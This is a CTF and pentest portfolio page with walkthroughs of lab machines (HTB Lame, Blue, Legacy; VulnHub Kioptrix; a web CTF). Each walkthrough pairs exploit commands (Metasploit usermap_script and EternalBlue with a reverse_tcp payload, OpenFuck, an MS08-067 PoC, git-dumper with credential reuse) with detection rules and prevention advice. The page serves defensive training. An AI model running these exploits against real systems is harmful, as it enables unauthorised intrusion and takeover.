CTF & Pentesting

Attack & Defend

Offensive practice is defensive training. Each writeup documents the full attack chain — enumeration to root — then flips perspective with a Defender's Lens: the MITRE ATT&CK techniques triggered, the Windows Event IDs or Sysmon events that fire, and the SIEM detection logic a SOC analyst would write to catch it.

🛡️
Why a SOC analyst does CTF — Understanding the attacker's methodology, tooling, and timing is the only way to write detection rules that actually work. Knowing that EternalBlue triggers Event ID 7045 and a DoublePulsar service install is the difference between a rule that catches WannaCry and one that doesn't.
← Back to Profile GitHub Writeups →
  In Progress

Content Coming Soon

CTF write-ups, machine walkthroughs, and lab notes are being added here. Check back soon for full coverage of CTF challenges and pentesting labs.

  View All Labs
Previous Lab All Labs Next Lab
HTBEasyLinux · Jan 2025
Lame
Samba 3.0.20 usermap_script RCE (CVE-2007-2447) — direct root shell, no privilege escalation step. One of HTB's foundational Linux machines.
🔍
Recon
📡
Enum
💥
Exploit
👑
Root
01 — Recon
01
Port Scan
Full TCP scan flags vsftpd 2.3.4, OpenSSH 4.7p1, and Samba 3.0.20 on 139/445. Anonymous SMB enumerable.
02
Version Research
searchsploit samba 3.0.20 → CVE-2007-2447 usermap_script command injection. No credentials needed.
02 — Exploitation
msf6 > use exploit/multi/samba/usermap_script msf6 > set RHOSTS 10.10.10.3 ; run [+] Command shell session 1 opened $ id uid=0(root) gid=0(root) groups=0(root)
03 — Screenshots
Nmap port scan results

Nmap port scan — Samba 3.0.20 flagged on 445

Root shell via usermap_script exploit

Root shell — uid=0(root) via CVE-2007-2447

04 — Flags
🚩 User
69454a██████████
👑 Root
8bf3e0██████████
05 — Video Walkthrough
🛡️ Defender's Lens
Detection & Response — Samba CVE-2007-2447
🎯
MITRE ATT&CK
T1210 Remote ServicesT1059 Command Interpreter
📋
Log Sources: Samba service logs (/var/log/samba/log.smbd), Linux auth logs (/var/log/auth.log), process audit logs if auditd is running.
🚨
Detection Signals: Shell process (bash/sh) spawned as a child of the smbd process. Unusual outbound connection from the Samba service port (445). Privilege change to UID 0 outside normal admin activity.
🔍
SIEM Rule Hint:process.parent.name:smbd AND process.name:(bash OR sh OR python)
🛡️
Prevention: Patch Samba to 3.0.25c or later. Restrict anonymous SMB access. Use a host firewall to limit 445/tcp to trusted hosts only.
View Writeup on GitHub
HTBEasyWindows · Jan 2025
Blue
MS17-010 EternalBlue on unpatched Windows 7 SP1. The CVE behind WannaCry — foundational knowledge for defensive security work.
🔍
Recon
📡
Enum
💥
Exploit
👑
Root
01 — Recon
01
SMB Vuln Scan
nmap --script smb-vuln-ms17-010 confirms VULNERABLE. Windows 7 SP1, SMBv1 enabled, port 445 open.
02
Exploit Selection
Metasploit ms17_010_eternalblue module. Payload: windows/x64/meterpreter/reverse_tcp via tun0.
02 — Exploitation
msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 > set RHOSTS 10.10.10.40 ; set LHOST tun0 ; run [+] SYSTEM shell obtained via EternalBlue! meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
03 — Screenshots
Nmap MS17-010 vulnerability scan

Nmap — MS17-010 VULNERABLE confirmed on Windows 7 SP1

EternalBlue exploit yielding SYSTEM shell

EternalBlue — NT AUTHORITY\SYSTEM shell obtained

04 — Flags
🚩 User
ff4523██████████
👑 Root
4dad0e██████████
05 — Video Walkthrough
🛡️ Defender's Lens
Detection & Response — MS17-010 EternalBlue
🎯
MITRE ATT&CK
T1210 Remote ServicesT1068 Exploit Priv Escalation
📋
Log Sources: Windows Security Event Log, Sysmon (Event IDs 1, 3, 7), Windows System Event Log, network firewall logs on port 445.
🚨
Detection Signals: Sysmon Event 3 — unexpected inbound connection to 445 from a non-domain host. Event ID 7045 — new service installed (DoublePulsar backdoor). Sysmon Event 1 — cmd.exe or powershell.exe spawned from NT AUTHORITY\SYSTEM without a parent process.
🔍
SIEM Rule Hint:event.code:7045 AND winlog.event_data.ServiceFileName:*ADMIN$*
🛡️
Prevention: Apply MS17-010 (KB4012212). Disable SMBv1: Set-SmbServerConfiguration -EnableSMB1Protocol $false. Block port 445 inbound at perimeter. Network-segment legacy Windows systems.
View Writeup on GitHub
VulnHubEasyLinux · Feb 2025
Kioptrix Level 1
Apache mod_ssl OpenFuck exploit on a local VulnHub VM — full lab workflow from download to root shell.
🔍
Recon
📡
Enum
💥
Exploit
👑
Root
00 — Lab Setup
🖥
Downloaded Kioptrix Level 1 (.ova) from VulnHub. Imported into VirtualBox alongside Kali Linux. Both assigned to the same NAT Network. Target IP discovered with netdiscover -r 192.168.100.0/24.
01 — Recon & Exploitation
$ netdiscover -r 192.168.100.0/24 192.168.100.15 VirtualBox NIC ← target $ nmap -A 192.168.100.15 80/tcp Apache/1.3.20 | 443/tcp mod_ssl/2.8.4 $ gcc -o openfuck 47080.c -lcrypto $ ./openfuck 0x6b 192.168.100.15 443 -c 40 bash# id uid=0(root) gid=0(root)
02 — Root
👑 Root Obtained
uid=0(root) gid=0(root)
03 — Screenshots
Nmap scan showing Apache and mod_ssl versions

Nmap — Apache/1.3.20 and mod_ssl/2.8.4 detected

OpenFuck exploit yielding root shell

OpenFuck exploit — uid=0(root) shell via mod_ssl overflow

🛡️ Defender's Lens
Detection & Response — Apache mod_ssl OpenFuck
🎯
MITRE ATT&CK
T1190 Public-Facing AppT1068 Exploit Priv Esc
📋
Log Sources: Apache access log (/var/log/apache/access_log), Apache error log, system auth logs, process monitoring (auditd).
🚨
Detection Signals: Malformed HTTPS request patterns targeting mod_ssl handshake. Shell (bash/sh) spawned as child of httpd/apache2. Outbound connection from the web server process to an attacker IP.
🔍
SIEM Rule Hint:process.parent.name:httpd AND process.name:(bash OR sh) AND user.id:0
🛡️
Prevention: Update Apache to 2.0+ and OpenSSL to a patched version. Run Apache with a dedicated low-privilege user. Apply ModSecurity WAF rules to detect exploit buffer patterns.
View Writeup on GitHub ↗ VulnHub Page
CTF EventMediumWeb · Mar 2025
Git Exposed
Exposed .git directory → source code recovery → hardcoded creds → admin flag. WebSec CTF 2025 web challenge.
🔍
Recon
📡
Enum
💥
Exploit
🚩
Flag
01 — Discovery & Exploitation
$ gobuster dir -u http://target.ctf/ -w raft-medium.txt /backup/.git (200) ← exposed! $ git-dumper http://target.ctf/backup/.git ./src $ grep -ri "password\|secret" ./src config.php: $admin_pass = 'P@ss1234'; $ curl -d "user=admin&pass=P@ss1234" http://target.ctf/admin/ flag{g1t_s3cr3ts_4r3_n0t_s3cr3t}
02 — Flag
🚩 CTF Flag
flag{g1t_s3cr3ts_4r3_n0t_s3cr3t}
03 — Screenshots
Gobuster scan revealing exposed .git directory

Gobuster — /backup/.git exposed (200 OK)

Hardcoded credentials discovered in recovered source

Hardcoded creds in config.php — flag retrieved via admin login

04 — Video Walkthrough
🛡️ Defender's Lens
Detection & Response — Exposed .git Directory
🎯
MITRE ATT&CK
T1190 Public-Facing AppT1552 Unsecured Credentials
📋
Log Sources: Web server access logs (Apache/Nginx). Look specifically for GET requests to /.git/HEAD, /.git/config, /.git/objects/.
🚨
Detection Signals: Multiple sequential 200 responses to /.git/* paths from a single IP. Burst of requests for git object files (40-character hex paths under /.git/objects/). User-agent strings associated with git-dumper or GitHack tools.
🔍
SIEM Rule Hint:http.request.uri:".git" AND http.response.status_code:200
🛡️
Prevention: Block access to .git at the web server: location ~ /\.git { deny all; }. Add .git to .gitignore in deployment pipelines. Never deploy with development artefacts in the webroot.
View Writeup on GitHub
HTBEasyWindows XP · Feb 2025
Legacy
MS08-067 NetAPI buffer overflow via manual Python PoC — no Metasploit. Shows why unpatched legacy Windows remains a critical attack surface.
🔍
Recon
📡
Enum
💥
Exploit
👑
Root
01 — Recon & Exploitation
$ nmap --script smb-vuln-ms08-067 10.10.10.4 VULNERABLE: ms08-067 — Risk: CRITICAL $ python ms08-067.py 10.10.10.4 6 445 [*] Sending exploit buffer... [+] Shell obtained! C:\> whoami nt authority\system
02 — Screenshots
Nmap MS08-067 vulnerability scan on Windows XP

Nmap — MS08-067 CRITICAL on Windows XP (port 445)

Python exploit yielding SYSTEM shell

Manual Python PoC — nt authority\system shell, no Metasploit

03 — Flags
🚩 User
993442██████████
👑 Root
aaa9e7██████████
🛡️ Defender's Lens
Detection & Response — MS08-067 NetAPI
🎯
MITRE ATT&CK
T1210 Remote ServicesT1574 Hijack Execution
📋
Log Sources: Windows Security Event Log, System Event Log, network IDS/IPS (Snort/Suricata on port 445), perimeter firewall NetFlow.
🚨
Detection Signals: Malformed RPC/SMB NetAPI request signature (Snort SID 14723). Sysmon Event 1 — cmd.exe spawned from services.exe under SYSTEM context. Event ID 4648 — logon attempt using explicit credentials following the exploit.
🔍
SIEM Rule Hint:event.code:4688 AND process.name:cmd.exe AND process.parent.name:services.exe AND user.name:"NT AUTHORITY\\SYSTEM"
🛡️
Prevention: Apply MS08-067 (KB958644). Immediately. Isolate Windows XP systems — they are end-of-life with no further patches. Deploy host-based IDS. Restrict SMB exposure at the network perimeter.
View Writeup on GitHub